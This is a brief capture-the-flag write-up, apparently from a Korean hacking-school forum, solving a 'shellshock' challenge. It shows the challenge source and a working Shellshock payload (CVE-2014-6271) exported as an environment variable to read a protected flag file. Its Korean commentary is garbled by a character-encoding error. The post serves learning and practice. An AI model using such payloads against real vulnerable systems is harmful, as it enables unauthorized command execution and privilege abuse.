http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8590 [º¹»ç]
shellshock@pwnable:~$ ls -al
total 980
drwxr-x--- 5 root shellshock 4096 Oct 23 2016 .
drwxr-xr-x 116 root root 4096 Oct 30 2023 ..
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
d--------- 2 root root 4096 Oct 12 2014 .bash_history
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
dr-xr-xr-x 2 root root 4096 Oct 12 2014 .irssi
drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c
shellshock@pwnable:~$ cat shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
shellshock@pwnable:~$ export MYFUN='() { :; }; /bin/cat flag'
shellshock@pwnable:~$ ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault (core dumped)
shellshock@pwnable:~$
shellshockÀÇ °³·ÐÀº ¾Æ·¡ÀÇ °Á¿¡¼ ½è°í...
¿ä¾àÇÏÀÚ¸é 4.3ÀÌÇÏÀÇ bash½©À» ½ÇÇàÇϸé ȯ°æº¯¼ö·Î µî·ÏµÈ °ÍµéÀ»
´Ù ½ÇÇàÇÑ´Ù´Â Ãë¾àÁ¡ÀÌ ÀÖ´Ù.
export MY... /bin/cat flag·Î flag¸¦ ÀоîµéÀÏ ¼ö ÀÖ´Ù. |
Hit : 236 Date : 2024/11/23 10:54
|